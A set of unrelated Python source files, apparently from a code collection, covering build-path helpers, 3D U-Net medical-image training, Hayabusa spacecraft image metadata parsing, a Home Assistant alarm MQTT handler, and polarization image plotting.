return os.path.join(Path.DEFAULT_DATA_PATH, Path.DEFAULT_I18N_FILE)
@staticmethod
def get_img_path():
"""
This function returns the path where the example image is stored.
:return: The path where the example image is stored.
"""
return os.path.join(Path.DEFAULT_IMAGE_PATH, Path.DEFAULT_IMAGE_FILE)
@staticmethod
def get_dist_img_path():
"""
This function returns the path where the example image will be stored.
:return: The path where the example image will be stored.
"""
Utils.create_folder_if_not_exist(Path.DEFAULT_DIST_IMAGE_PATH)
return os.path.join(Path.DEFAULT_DIST_IMAGE_PATH, Path.DEFAULT_IMAGE_FILE)
@staticmethod
def get_readme_path():
"""
This function returns the path where the help file is stored.
:return: The path where the help file is stored.
"""
return os.path.join(Path.DEFAULT_ROOT_PATH, Path.DEFAULT_README_FILE)
@staticmethod
def get_dist_readme_path():
"""
This function returns the path where the help file will be stored.
:return: The path where the help file will be stored.
"""
Utils.create_folder_if_not_exist(Path.DEFAULT_DIST_IMAGE_PATH)
return os.path.join(Path.DEFAULT_DIST_PATH, Path.DEFAULT_README_FILE)
@staticmethod
def get_ini_path():
"""
This function returns the path where we read the configurations.
:return: The path where we read the configurations.
"""
return os.path.join(Path.DEFAULT_ROOT_PATH, Path.DEFAULT_INI_FILE)
@staticmethod
def get_ini_model_path():
"""
This function returns the path where we read the model configurations.
:return: The path where we read the model configurations.
"""
Utils.create_folder_if_not_exist(Path.DEFAULT_DATA_PATH)
return os.path.join(Path.DEFAULT_DATA_PATH, Path.DEFAULT_INI_MODEL_FILE)
@staticmethod
def get_exe_path():
"""
This function returns the path where we store the exec file.
:return: The path where we store the exec file.
"""
if Utils.is_linux():
return Path.get_unix_exe_path()
elif Utils.is_windows():
return Path.get_windows_exe_path()
else:
return Path.get_unix_exe_path()
@staticmethod
def get_unix_exe_path():
"""
This function returns the path where we store the unix exec file.
:return: The path where we store the unix exec file.
"""
return os.path.join(Path.DEFAULT_DIST_PATH, Path.DEFAULT_EXEC_UNIX_FILE)
@staticmethod
def get_windows_exe_path():
"""
This function returns the path where we store the windows exec file.
:return: The path where we store the windows exec file.
"""
return os.path.join(Path.DEFAULT_DIST_PATH, Path.DEFAULT_EXEC_WINDOWS_FILE)
@staticmethod
def get_zip_dest():
"""
This function returns the path where we store the windows exec file.
:return: The path where we store the windows exec file.
"""
return os.path.join(Path.DEFAULT_DIST_PATH, Path.DEFAULT_EXEC_WINDOWS_FILE)
@staticmethod
def get_zip_path(with_extension=False):
"""
This function returns the current os.
:param with_extension: If we want to add the .zip extension.
:return: A string that describe the current os.
"""
name = "wingspan-stats"
version = _version.__version__
if Utils.is_linux():
env = "linux"
elif Utils.is_windows():
env = "windows"
else:
env = "mac"
return os.path.join(Path.DEFAULT_DIST_PATH,
Path.DEFAULT_ZIP_NAME.format(name=name, version=version, env=env),
".zip" if with_extension else "")
@staticmethod
def get_log_path():
"""
This function returns the path where we store the logs.
:return: The path where we store the logs.
"""
Utils.create_folder_if_not_exist(Path.DEFAULT_LOG_PATH)
path = os.path.join(Path.DEFAULT_LOG_PATH, Path.DEFAULT_LOG_FILE)
open(path, 'a+')
return path
|
<gh_stars>100-1000
import os
import glob
from unet3d.data import write_data_to_file, open_data_file
from unet3d.generator import get_training_and_validation_generators
from unet3d.model import unet_model_3d
from unet3d.training import load_old_model, train_model
import argparse
import keras
import time
import sys
parser = argparse.ArgumentParser(description='train opts:')
parser.add_argument('--bs', type=int, default=1)
parser.add_argument('--intra', '--num_intra_threads', type=int, default=56)
parser.add_argument('--inter', '--num_inter_threads', type=int, default=1)
parser.add_argument('--warmup', '--nw', type=int, default=10)
parser.add_argument('--report_interval', type=int, default=1)
parser.add_argument('--nb', type=int, default=10)
args = parser.parse_args()
import tensorflow as tf
from keras import backend as K
config = tf.ConfigProto(intra_op_parallelism_threads=args.intra, inter_op_parallelism_threads=args.inter)
sess = tf.Session(graph=tf.get_default_graph(), config=config)
K.set_session(sess)
class TimeReporter(keras.callbacks.Callback):
def on_batch_begin(self, batch, logs=None):
self.__start_time = time.time()
def on_batch_end(self, batch, logs=None):
self.__end_time = time.time()
if hasattr(self, '__stop'):
return
if not hasattr(self, 'elapsed_time'):
self.elapsed_time = 0
if not hasattr(self, 'elapsed_step'):
self.elapsed_step = 0
warmup = config['warmup']
report_interval = config['report_interval']
if batch >= warmup:
# print('\ntime of this step: {}'.format(self.__end_time - self.__start_time))
self.elapsed_time += (self.__end_time - self.__start_time)
self.elapsed_step += 1
# print('elapsed_step: {}'.format(self.elapsed_step))
# print('warmup: {}'.format(warmup))
# print('n_batch: {}'.format(config['n_batch']))
if self.elapsed_step + warmup == config['n_batch']:
# print('bs: {}'.format(config['batch_size']))
# print('elapsed_time: {}'.format(self.elapsed_time))
print('\nTotal samples/sec: %.4f samples/s' % (self.elapsed_step * config["batch_size"] / self.elapsed_time))
self.elapsed_time = 0
self.elapsed_step = 0
self.__stop = True
sys.exit()
config = dict()
config["pool_size"] = (2, 2, 2) # pool size for the max pooling operations
config["image_shape"] = (144, 144, 144) # This determines what shape the images will be cropped/resampled to.
config["patch_shape"] = (64, 64, 64) # switch to None to train on the whole image
config["labels"] = (1, 2, 4) # the label numbers on the input image
config["n_labels"] = len(config["labels"])
config["all_modalities"] = ["t1", "t1Gd", "flair", "t2"]
config["training_modalities"] = config["all_modalities"] # change this if you want to only use some of the modalities
config["nb_channels"] = len(config["training_modalities"])
if "patch_shape" in config and config["patch_shape"] is not None:
config["input_shape"] = tuple([config["nb_channels"]] + list(config["patch_shape"]))
else:
config["input_shape"] = tuple([config["nb_channels"]] + list(config["image_shape"]))
config["truth_channel"] = config["nb_channels"]
config["deconvolution"] = True # if False, will use upsampling instead of deconvolution
config["batch_size"] = args.bs
config["validation_batch_size"] = 12
config["n_epochs"] = 500 # cutoff the training after this many epochs
config["patience"] = 10 # learning rate will be reduced after this many epochs if the validation loss is not improving
config["early_stop"] = 50 # training will be stopped after this many epochs without the validation loss improving
config["initial_learning_rate"] = 0.00001
config["learning_rate_drop"] = 0.5 # factor by which the learning rate will be reduced
config["validation_split"] = 0.8 # portion of the data that will be used for training
config["flip"] = False # augments the data by randomly flipping an axis during
config["permute"] = True # data shape must be a cube. Augments the data by permuting in various directions
config["distort"] = None # switch to None if you want no distortion
config["augment"] = config["flip"] or config["distort"]
config["validation_patch_overlap"] = 0 # if > 0, during training, validation patches will be overlapping
config["training_patch_start_offset"] = (16, 16, 16) # randomly offset the first patch index by up to this offset
config["skip_blank"] = True # if True, then patches without any target will be skipped
config["data_file"] = os.path.join(os.environ["DATASET_LOCATION"], "brats_data.h5")
config["model_file"] = os.environ["IN_GRAPH"]
config["training_file"] = os.path.join(os.environ["DATASET_LOCATION"], "training_ids.pkl")
config["validation_file"] = os.path.join(os.environ["DATASET_LOCATION"], "validation_ids.pkl")
config["overwrite"] = False # If True, will previous files. If False, will use previously written files.
config['warmup'] = args.warmup
config['report_interval'] = args.report_interval
config['n_batch'] = args.nb
def fetch_training_data_files():
training_data_files = list()
for subject_dir in glob.glob(os.path.join(os.path.dirname(__file__), "data", "preprocessed", "*", "*")):
subject_files = list()
for modality in config["training_modalities"] + ["truth"]:
subject_files.append(os.path.join(subject_dir, modality + ".nii.gz"))
training_data_files.append(tuple(subject_files))
return training_data_files
def main(overwrite=False):
# convert input images into an hdf5 file
if overwrite or not os.path.exists(config["data_file"]):
training_files = fetch_training_data_files()
write_data_to_file(training_files, config["data_file"], image_shape=config["image_shape"])
data_file_opened = open_data_file(config["data_file"])
if not overwrite and os.path.exists(config["model_file"]):
model = load_old_model(config["model_file"])
else:
# instantiate new model
model = unet_model_3d(input_shape=config["input_shape"],
pool_size=config["pool_size"],
n_labels=config["n_labels"],
initial_learning_rate=config["initial_learning_rate"],
deconvolution=config["deconvolution"])
# get training and testing generators
train_generator, validation_generator, n_train_steps, n_validation_steps = get_training_and_validation_generators(
data_file_opened,
batch_size=config["batch_size"],
data_split=config["validation_split"],
overwrite=overwrite,
validation_keys_file=config["validation_file"],
training_keys_file=config["training_file"],
n_labels=config["n_labels"],
labels=config["labels"],
patch_shape=config["patch_shape"],
validation_batch_size=config["validation_batch_size"],
validation_patch_overlap=config["validation_patch_overlap"],
training_patch_start_offset=config["training_patch_start_offset"],
permute=config["permute"],
augment=config["augment"],
skip_blank=config["skip_blank"],
augment_flip=config["flip"],
augment_distortion_factor=config["distort"])
print('run training')
# run training
train_model(model=model,
model_file=config["model_file"],
training_generator=train_generator,
validation_generator=validation_generator,
steps_per_epoch=n_train_steps,
validation_steps=n_validation_steps,
initial_learning_rate=config["initial_learning_rate"],
learning_rate_drop=config["learning_rate_drop"],
learning_rate_patience=config["patience"],
early_stopping_patience=config["early_stop"],
n_epochs=config["n_epochs"],
timer=TimeReporter)
data_file_opened.close()
if __name__ == "__main__":
main(overwrite=config["overwrite"])
|
import math
from math import radians as rads, degrees as degs
import re
from configparser import ConfigParser
from ast import literal_eval
from decimal import *
getcontext().prec = 6
import numpy as np
import quaternion
from astropy.coordinates import SkyCoord
from astropy.time import Time
from astropy import units
from visnav.settings import *
from visnav.algo import tools
# Data main page: https://sbn.psi.edu/pds/resource/hayamica.html
#
# Two sets of (bad) metadata!
#
# Photometry based, supposedly more accurate, used for image lbl files:
# - Info from https://sbnarchive.psi.edu/pds3/hayabusa/HAY_A_AMICA_3_HAYAMICA_V1_0/data/parameters/paramphot.lbl
# - Data from https://sbnarchive.psi.edu/pds3/hayabusa/HAY_A_AMICA_3_HAYAMICA_V1_0/data/parameters/paramphot.tab
#
# LIDAR based, at least distances are more reasonable (phot 300m vs lidar 8km)
# However, places asteroid between s/c and sun so that phase angle almost 180 deg instead of close to 0 deg as should
# - Info from https://sbnarchive.psi.edu/pds3/hayabusa/HAY_A_AMICA_3_HAYAMICA_V1_0/data/parameters/paramlid.lbl
# - Data from https://sbnarchive.psi.edu/pds3/hayabusa/HAY_A_AMICA_3_HAYAMICA_V1_0/data/parameters/paramlid.tab
#
#
# >>>>
# ======================================================================
# Geometry Information - Coordinate System:
# ======================================================================
#
# The label files include the following geometric variables:
# - SC SUN POSITION VECTOR: The vector from the spacecraft to the Sun
# in equatorial J2000 inertial frame.
# - SC TARGET POSITION VECTOR: The vector from the spacecraft to the
# centre of the comet nucleus in equatorial J2000 inertial frame.
# - SC TARGET VELOCITY VECTOR: The spacecraft to comet nucleus velocity
# vector in in equatorial J2000 inertial frame.
# - TARGET CENTER DISTANCE: The distance between the spacecraft and the
# comet nucleus centre. (Note that also for checkout and stellar
# calibration images the comet nucleus distance is given here.)
# - SUB SPACECRAFT LATITUDE and SUB SPACECRAFT LONGITUDE: The latitude
# and longitude of the sub-spacecraft point derived from the Flight
# Dynamics body-fixed reference frame implicitly specified by the
# information provided in the comet attitude file CATT.
# - RIGHT ASCENSION and DECLINATION: Right Ascension and Declination of
# the camera boresight direction in equatorial J2000 inertial frame.
# - CELESTIAL NORTH CLOCK ANGLE: The direction of celestial north at the
# center of the image - measured from the upward direction,
# clockwise to the direction toward celestial north.
# - SOLAR ELONGATION: The angle between the line of sight of observation
# and the direction of the Sun.
# - BODY_POLE_CLOCK_ANGLE: specifies the direction of the target body's
# rotation axis in an image. It is measured from the 'upward' direction,
# clockwise to the direction of the northern rotational pole as projected
# into the image plane, assuming the image is displayed as defined by
# the SAMPLE_DISPLAY_DIRECTION and LINE_DISPLAY_DIRECTION elements.
# - HAY:BODY_POLE_SUN_ANGLE: specifies the angle between the rotation pole
# of the target body and the direction from the target body to the sun
# - HAY:BODY_POLE_ASPECT_ANGLE: Specifies the angle of the rotation pole
# of the body with respect to the image plane
#
# All geometric values are calculated for the time t = IMAGE TIME
# (and not START TIME).
def load_image_meta(src, sm):
# params given in equatorial J2000 coordinates, details:
# https://pds.nasa.gov/ds-view/pds/viewProfile.jsp
# ?dsid=RO-C-NAVCAM-2-ESC3-MTP021-V1.0
with open(src, 'r') as f:
config_data = f.read()
config_data = '[meta]\n' + config_data
config_data = re.sub(r'^/\*', '#', config_data, flags=re.M)
config_data = re.sub(r'^\^', '', config_data, flags=re.M)
config_data = re.sub(r'^(\w+):(\w+)', r'\1__\2', config_data, flags=re.M)
config_data = re.sub(r'^END\s*$', '', config_data, flags=re.M)
config_data = re.sub(r'^NOTE\s*=\s*"[^"]*"', '', config_data, flags=re.M)
config_data = re.sub(r'^OBJECT\s*=\s*.*?END_OBJECT\s*=\s*\w+', '', config_data, flags=re.M|re.S)
config_data = re.sub(r' <(DEGREE|SECOND|KILOMETER)>', '', config_data)
config = ConfigParser(converters={'tuple': literal_eval})
config.read_string(config_data)
image_time = config.get('meta', 'START_TIME')
# spacecraft orientation, equatorial J2000
sc_rot_ra = config.getfloat('meta', 'RIGHT_ASCENSION')
sc_rot_dec = config.getfloat('meta', 'DECLINATION')
sc_rot_cnca = config.getfloat('meta', 'CELESTIAL_NORTH_CLOCK_ANGLE')
sc_igrf_q = tools.ypr_to_q(rads(sc_rot_dec), rads(sc_rot_ra), -rads(sc_rot_cnca)) # same with rosetta lbls also
# from asteroid to spacecraft, asteroid body fixed coordinates
# TODO: figure out why FOR SOME REASON distance is given ~30x too close
ast_sc_dist = config.getfloat('meta', 'TARGET_CENTER_DISTANCE') * 30
ast_sc_lat = config.getfloat('meta', 'SUB_SPACECRAFT_LATITUDE')
ast_sc_lon = config.getfloat('meta', 'SUB_SPACECRAFT_LONGITUDE')
ast_sc_bff_r = tools.spherical2cartesian(rads(ast_sc_lat), rads(ast_sc_lon), ast_sc_dist)
ast_axis_img_clk_ang = config.getfloat('meta', 'BODY_POLE_CLOCK_ANGLE')
ast_axis_img_plane_ang = config.getfloat('meta', 'HAY__BODY_POLE_ASPECT_ANGLE') # what is the use?
# from sun to spacecraft, equatorial J2000
ast_sun_dist = config.getfloat('meta', 'TARGET_HELIOCENTRIC_DISTANCE')
ast_sun_lat = config.getfloat('meta', 'SUB_SOLAR_LATITUDE')
ast_sun_lon = config.getfloat('meta', 'SUB_SOLAR_LONGITUDE')
sun_ast_bff_r = -tools.spherical2cartesian(rads(ast_sun_lat), rads(ast_sun_lon), ast_sun_dist)
sun_sc_bff_r = sun_ast_bff_r + ast_sc_bff_r
ast_axis_sun_ang = config.getfloat('meta', 'HAY__BODY_POLE_SUN_ANGLE')
a = config.getfloat('meta', 'SUB_SOLAR_AZIMUTH') # what is this!?
# TODO: continue here
ast_axis_scf_q = tools.ypr_to_q(-rads(ast_sc_lat), -rads(ast_sc_lon), 0)
# TODO: figure out: how to get roll as some ast_axis_img_clk_ang come from ast_sc_lat?
ast_rot_scf_q = tools.ypr_to_q(0, 0, -rads(ast_axis_img_clk_ang))
ast_scf_q = ast_axis_scf_q #* ast_rot_scf_q
dec = 90 - ast_sc_lat
ra = -ast_sc_lon
if dec > 90:
dec = 90 + ast_sc_lat
ra = tools.wrap_degs(ra + 180)
print('ra: %f, dec: %f, zlra: %f' % (ra, dec, ast_axis_img_clk_ang))
ast_igrf_q = ast_scf_q * sc_igrf_q
sun_ast_igrf_r = tools.q_times_v(ast_igrf_q, sun_ast_bff_r)
ast_sc_igrf_r = tools.q_times_v(ast_igrf_q, ast_sc_bff_r)
sun_sc_igrf_r = tools.q_times_v(ast_igrf_q, sun_sc_bff_r)
z_axis = np.array([0, 0, 1])
x_axis = np.array([1, 0, 0])
ast_axis_u = tools.q_times_v(ast_igrf_q, z_axis)
ast_zlon_u = tools.q_times_v(ast_igrf_q, x_axis)
ast_axis_dec, ast_axis_ra, _ = tools.cartesian2spherical(*ast_axis_u)
ast_zlon_proj = tools.vector_rejection(ast_zlon_u, z_axis)
ast_zlon_ra = tools.angle_between_v(ast_zlon_proj, x_axis)
ast_zlon_ra *= 1 if np.cross(x_axis, ast_zlon_proj).dot(z_axis) > 0 else -1
# frame where ast zero lat and lon point towards the sun?
# ast_axis_ra = -ast_sun_lon
# ast_axis_dec = 90 - ast_sun_lat
# ast_axis_zero_lon_ra = 0
arr2str = lambda arr: '[%s]' % ', '.join(['%f' % v for v in arr])
print('sun_ast_bff_r: %s' % arr2str(sun_ast_bff_r * 1e3))
print('sun_sc_bff_r: %s' % arr2str(sun_sc_bff_r * 1e3))
print('ast_sc_bff_r: %s' % arr2str(ast_sc_bff_r * 1e3))
# TODO: even the light is wrong, should be right based on the sun_ast and sun_sc vectors!!
print('sun_ast_igrf_r: %s' % arr2str(sun_ast_igrf_r * 1e3))
print('sun_sc_igrf_r: %s' % arr2str(sun_sc_igrf_r * 1e3))
print('ast_sc_igrf_r: %s' % arr2str(ast_sc_igrf_r * 1e3))
print('ast_axis_ra: %f' % degs(ast_axis_ra))
print('ast_axis_dec: %f' % degs(ast_axis_dec))
print('ast_zlon_ra: %f' % degs(ast_zlon_ra))
aa = quaternion.as_rotation_vector(sc_igrf_q)
angle = np.linalg.norm(aa)
sc_angleaxis = [angle] + list(aa/angle)
print('sc_angleaxis [rad]: %s' % arr2str(sc_angleaxis))
def load_image_data(image_filename, table_file):
cols = ["OBSERVATION_END_MET", "IMAGE_FILENAME", "OBSERVATION_END_TIME", "SPC_X", "SPC_Y", "SPC_Z", "AST_J2_X",
"AST_J2_Y", "AST_J2_Z", "SPC_J2_X", "SPC_J2_Y", "SPC_J2_Z", "BODY_SURFACE_DISTANCE", "CENTER_LON",
"CENTER_LAT", "CENTER_PIXEL_RES", "CELESTIAL_N_CLOCK_ANGLE", "BODY_POLE_CLOCK_ANGLE",
"BODY_POLE_ASPECT_ANGLE", "SUN_DIR_CLOCK_ANGLE", "RIGHT_ASCENSION", "DECLINATION", "SUBSOLAR_LON",
"SUBSOLAR_LAT", "INCIDENCE_ANGLE", "EMISSION_ANGLE", "PHASE_ANGLE", "SOLAR_ELONGATION", "SUB_SC_LON",
"SUB_SC_LAT", "BODY_CENTER_DISTANCE", "PIXEL_OFFSET_X", "PIXEL_OFFSET_Y", "AST_SUN_ROT_ANGLE"]
idx = dict(zip(cols, range(len(cols))))
with open(table_file, 'r') as fh:
alldata = [re.split(r'\s+', row)[1:] for row in fh]
d = None
for row in alldata:
if row[idx['IMAGE_FILENAME']] == image_filename:
d = row
break
assert d is not None, 'data for image %s not found' % image_filename
# spacecraft orientation, equatorial J2000
sc_rot_ra = float(d[idx['RIGHT_ASCENSION']])
sc_rot_dec = float(d[idx['DECLINATION']])
sc_rot_cnca = float(d[idx['CELESTIAL_N_CLOCK_ANGLE']])
sc_igrf_q = tools.ypr_to_q(rads(sc_rot_dec), rads(sc_rot_ra), -rads(sc_rot_cnca)) # same with rosetta lbls also
sun_ast_igrf_r = np.array([d[idx['AST_J2_X']], d[idx['AST_J2_Y']], d[idx['AST_J2_Z']]]).astype(np.float)
sun_sc_igrf_r = np.array([d[idx['SPC_J2_X']], d[idx['SPC_J2_Y']], d[idx['SPC_J2_Z']]]).astype(np.float)
arr2str = lambda arr: '[%s]' % ', '.join(['%f' % v for v in arr])
print('sun_ast_igrf_r: %s' % arr2str(sun_ast_igrf_r * 1e3))
print('sun_sc_igrf_r: %s' % arr2str(sun_sc_igrf_r * 1e3))
print('ast_sc_igrf_r: %s' % arr2str((sun_sc_igrf_r - sun_ast_igrf_r) * 1e3))
# print('ast_axis_ra: %f' % degs(ast_axis_ra))
# print('ast_axis_dec: %f' % degs(ast_axis_dec))
# print('ast_zlon_ra: %f' % degs(ast_zlon_ra))
aa = quaternion.as_rotation_vector(sc_igrf_q)
angle = np.linalg.norm(aa)
sc_angleaxis = [angle] + list(aa/angle)
print('sc_angleaxis [rad]: %s' % arr2str(sc_angleaxis))
if __name__ == '__main__':
if 1:
load_image_meta(r'C:\projects\sispo\data\targets\st_2422895458_v.lbl', None)
else:
load_image_data('st_2422895458_v.fit', r'C:\projects\sispo\data\targets\hayabusa_paramlid.tab')
|
<reponame>avidit/home-assistant-config
import json
import logging
from homeassistant.core import (
HomeAssistant,
callback,
)
from homeassistant.components.mqtt import (
DOMAIN as ATTR_MQTT,
CONF_STATE_TOPIC,
CONF_COMMAND_TOPIC,
)
import homeassistant.components.mqtt as mqtt
from homeassistant.helpers.json import JSONEncoder
from homeassistant.util import slugify
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from . import const
from .helpers import (
friendly_name_for_entity_id,
)
_LOGGER = logging.getLogger(__name__)
CONF_EVENT_TOPIC = "event_topic"
class MqttHandler:
def __init__(self, hass: HomeAssistant):
self.hass = hass
self._config = None
self._subscribed_topics = []
self._subscriptions = []
async def async_update_config(_args=None):
"""mqtt config updated, reload the configuration."""
old_config = self._config
new_config = self.hass.data[const.DOMAIN]["coordinator"].store.async_get_config()
if old_config and old_config[ATTR_MQTT] == new_config[ATTR_MQTT]:
# only update MQTT config if some parameters are changed
return
self._config = new_config
if not old_config or old_config[ATTR_MQTT][CONF_COMMAND_TOPIC] != new_config[ATTR_MQTT][CONF_COMMAND_TOPIC]:
# re-subscribing is only needed if the command topic has changed
await self._async_subscribe_topics()
_LOGGER.debug("MQTT config was (re)loaded")
self._subscriptions.append(
async_dispatcher_connect(hass, "alarmo_config_updated", async_update_config)
)
self.hass.async_add_job(async_update_config)
@callback
def async_alarm_state_changed(area_id: str, old_state: str, new_state: str):
if not self._config[ATTR_MQTT][const.ATTR_ENABLED]:
return
topic = self._config[ATTR_MQTT][CONF_STATE_TOPIC]
if not topic: # do not publish if no topic is provided
return
if area_id and len(self.hass.data[const.DOMAIN]["areas"]) > 1:
# handle the sending of a state update for a specific area
area = self.hass.data[const.DOMAIN]["areas"][area_id]
topic = topic.rsplit('/', 1)
topic.insert(1, slugify(area.name))
topic = "/".join(topic)
payload_config = self._config[ATTR_MQTT][const.ATTR_STATE_PAYLOAD]
if new_state in payload_config and payload_config[new_state]:
message = payload_config[new_state]
else:
message = new_state
hass.async_create_task(mqtt.async_publish(self.hass, topic, message, retain=True))
_LOGGER.debug("Published state '{}' on topic '{}'".format(message, topic))
self._subscriptions.append(
async_dispatcher_connect(self.hass, "alarmo_state_updated", async_alarm_state_changed)
)
@callback
def async_handle_event(event: str, area_id: str, args: dict = {}):
if not self._config[ATTR_MQTT][const.ATTR_ENABLED]:
return
topic = self._config[ATTR_MQTT][CONF_EVENT_TOPIC]
if not topic: # do not publish if no topic is provided
return
if area_id and len(self.hass.data[const.DOMAIN]["areas"]) > 1:
# handle the sending of a state update for a specific area
area = self.hass.data[const.DOMAIN]["areas"][area_id]
topic = topic.rsplit('/', 1)
topic.insert(1, slugify(area.name))
topic = "/".join(topic)
if event == const.EVENT_ARM:
payload = {
"event": "{}_{}".format(
event.upper(),
args["arm_mode"].split("_", 1).pop(1).upper()
),
"delay": args["delay"],
}
elif event == const.EVENT_TRIGGER:
payload = {
"event": event.upper(),
"delay": args["delay"],
"sensors": [
{
"entity_id": entity,
"name": friendly_name_for_entity_id(entity, self.hass),
}
for (entity, state) in args["open_sensors"].items()
]
}
elif event == const.EVENT_FAILED_TO_ARM:
payload = {
"event": event.upper(),
"sensors": [
{
"entity_id": entity,
"name": friendly_name_for_entity_id(entity, self.hass),
}
for (entity, state) in args["open_sensors"].items()
]
}
elif event == const.EVENT_COMMAND_NOT_ALLOWED:
payload = {
"event": event.upper(),
"state": args["state"],
"command": args["command"].upper()
}
elif event in [const.EVENT_INVALID_CODE_PROVIDED, const.EVENT_NO_CODE_PROVIDED]:
payload = {
"event": event.upper()
}
else:
return
payload = json.dumps(payload, cls=JSONEncoder)
hass.async_create_task(mqtt.async_publish(self.hass, topic, payload))
self._subscriptions.append(
async_dispatcher_connect(self.hass, "alarmo_event", async_handle_event)
)
def __del__(self):
"""prepare for removal"""
while len(self._subscribed_topics):
self._subscribed_topics.pop()()
while len(self._subscriptions):
self._subscriptions.pop()()
async def _async_subscribe_topics(self):
"""install a listener for the command topic."""
if len(self._subscribed_topics):
while len(self._subscribed_topics):
self._subscribed_topics.pop()()
_LOGGER.debug("Removed subscribed topics")
if not self._config[ATTR_MQTT][const.ATTR_ENABLED]:
return
self._subscribed_topics.append(
await mqtt.async_subscribe(
self.hass,
self._config[ATTR_MQTT][CONF_COMMAND_TOPIC],
self.async_message_received,
)
)
_LOGGER.debug("Subscribed to topic {}".format(self._config[ATTR_MQTT][CONF_COMMAND_TOPIC]))
@callback
async def async_message_received(self, msg):
command = None
code = None
area = None
try:
payload = json.loads(msg.payload)
payload = {k.lower(): v for k, v in payload.items()}
if "command" in payload:
command = payload["command"]
elif "cmd" in payload:
command = payload["cmd"]
elif "action" in payload:
command = payload["action"]
elif "state" in payload:
command = payload["state"]
if "code" in payload:
code = payload["code"]
elif "pin" in payload:
code = payload["pin"]
elif "password" in payload:
code = payload["password"]
elif "pincode" in payload:
code = payload["pincode"]
if "area" in payload and payload["area"]:
area = payload["area"]
except ValueError:
# no JSON structure found
command = msg.payload
code = None
if type(command) is str:
command = command.lower()
else:
_LOGGER.warning("Received unexpected command")
return
payload_config = self._config[ATTR_MQTT][const.ATTR_COMMAND_PAYLOAD]
skip_code = not self._config[ATTR_MQTT][const.ATTR_REQUIRE_CODE]
command_payloads = {}
for item in const.COMMANDS:
if item in payload_config and payload_config[item]:
command_payloads[item] = payload_config[item].lower()
elif item not in payload_config:
command_payloads[item] = item.lower()
if command not in list(command_payloads.values()):
_LOGGER.warning("Received unexpected command: %s", command)
return
if area:
res = list(filter(lambda el: slugify(el.name) == area, self.hass.data[const.DOMAIN]["areas"].values()))
if not res:
_LOGGER.warning("Area {} does not exist".format(area))
return
entity = res[0]
else:
if self._config[const.ATTR_MASTER][const.ATTR_ENABLED] and len(self.hass.data[const.DOMAIN]["areas"]) > 1:
entity = self.hass.data[const.DOMAIN]["master"]
elif len(self.hass.data[const.DOMAIN]["areas"]) == 1:
entity = list(self.hass.data[const.DOMAIN]["areas"].values())[0]
else:
_LOGGER.warning("No area specified")
return
_LOGGER.debug("Received command {}".format(command))
if command == command_payloads[const.COMMAND_DISARM]:
await entity.async_alarm_disarm(code=code, skip_code=skip_code)
elif command == command_payloads[const.COMMAND_ARM_AWAY]:
await entity.async_alarm_arm_away(code, skip_code)
elif command == command_payloads[const.COMMAND_ARM_NIGHT]:
await entity.async_alarm_arm_night(code, skip_code)
elif command == command_payloads[const.COMMAND_ARM_HOME]:
await entity.async_alarm_arm_home(code, skip_code)
elif command == command_payloads[const.COMMAND_ARM_CUSTOM_BYPASS]:
await entity.async_alarm_arm_custom_bypass(code, skip_code)
elif command == command_payloads[const.COMMAND_ARM_VACATION]:
await entity.async_alarm_arm_vacation(code, skip_code)
|
import sys
sys.path.append('C:/python scripts/ciecam02 plot')
import Read_Meredith as rm
# from scipy.ndimage import binary_dilation
# from scipy.stats import circstd
# import scipy.fftpack as fftpack
# from scipy.linalg import solve_banded
import vispol
import numpy as np
from scipy.sparse.linalg import spsolve
# from scipy.sparse.linalg import spilu
import matplotlib.pyplot as plt
from scipy.signal import convolve2d
# from scipy.ndimage import gaussian_filter
from scipy.ndimage import grey_erosion
from scipy.signal import medfilt2d
from scipy.signal import wiener
def ang_diff(D):
P = np.pi
return 1 - 2/P * np.abs((D + P/2) % (2 * P) - P)
vispol.register_cmaps()
data_folder = 'c:/users/z5052714/documents/unsw/unsw/data_sets/'
# filename = data_folder + 'forscottfrommeredith/162041.L1B2.v006.hdf5'
# filename = data_folder + 'forscottfrommeredith/162651.L1B2.v006.hdf5'
filename = data_folder + 'forscottfrommeredith/094821.L1B2.v006.hdf5'
# I, P, A = rm.getIPA(filename, start=[2, 32], end=[3900, 1403])
_, P, A = rm.getIPA(filename, start=[2, 32], end=[3000, 1403])
# I, P, A = rm.getIPA(filename, start=[1000, 800], end=[1600, 1300])
# I, _, A = rm.getIPA(filename, start=[2000, 150], end=[2200, 450]) # looks great
# _, _, A = rm.getIPA(filename, start=[1500, 150], end=[2200, 450]) # looks good with scaling
# _, _, A = rm.getIPA(filename, start=[2, 150], end=[2600, 1000])
# I = np.clip(I/np.percentile(I,99), 0, 1)
A *= np.pi/180.0
A[A > np.pi] -= np.pi
delta = vispol.delta_aop(A)
A45 = A + np.pi/8
A45[A45 > np.pi] -= np.pi
Aneg45 = A - np.pi/8
Aneg45[Aneg45 < 0 ] += np.pi
# plt.plot(np.linspace(-np.pi, np.pi, 256), ang_diff(np.linspace(-np.pi, np.pi, 256)))
# delta_patch = delta[2520:2620, 1200:1300].reshape((-1, 1))
# A_patch = A[2520:2620, 1200:1300].reshape((-1, 1))
# P_patch = P[2520:2620, 1200:1300].reshape((-1, 1))
# hist1, hist2, edges = np.histogram2d(A_patch, delta_patch, bins='fd')
# f, ax = plt.subplots(3)
# ax[0].scatter(A_patch, delta_patch)
# ax[1].scatter(A_patch, P_patch)
# ax[2].scatter(P_patch, delta_patch)
# print(np.mean(P_patch))
# print(np.std(P_patch))
# print(vispol.circular_mean(A_patch))
# print(np.sqrt(-2 * np.log(np.hypot(np.mean(np.sin(2 * A_patch)), np.mean(np.cos(2 * A_patch))))))
# print(np.mean(delta_patch))
# plt.show()
cap = 95
sigma = 2
# delta = grey_erosion(delta, size=(5, 5))
# delta = medfilt2d(delta, 7)
# delta = wiener(delta, 5)
# A, _ = vispol.histogram_eq(A,
# weighted=True,
# min_change=0.25,
# element=5,
# deltas = delta,
# suppress_noise=True,
# interval=[0.0,np.pi])#,
# # box=[[1100, A.shape[0]], [0, A.shape[1]]])
# plt.imsave("C:/users/z5052714/documents/weekly_meetings/28-06-2019/AoP_rot.png", A, cmap="AoP", vmin=0, vmax=np.pi)
f, ax = plt.subplots(1, 4)
# ax[0].imshow(delta, vmin=0, vmax=1)
# ax[1].imshow(A, vmin=0, vmax=np.pi, cmap="AoP")
# ax[2].imshow(P, vmin=0, vmax=1)
ax[0].imshow(np.cos(2 * A), cmap="gray")
ax[1].imshow(np.cos(2 * A45), cmap="gray")
ax[2].imshow(np.sin(2 * A), cmap="gray")
ax[3].imshow(np.cos(2 * Aneg45), cmap="gray")
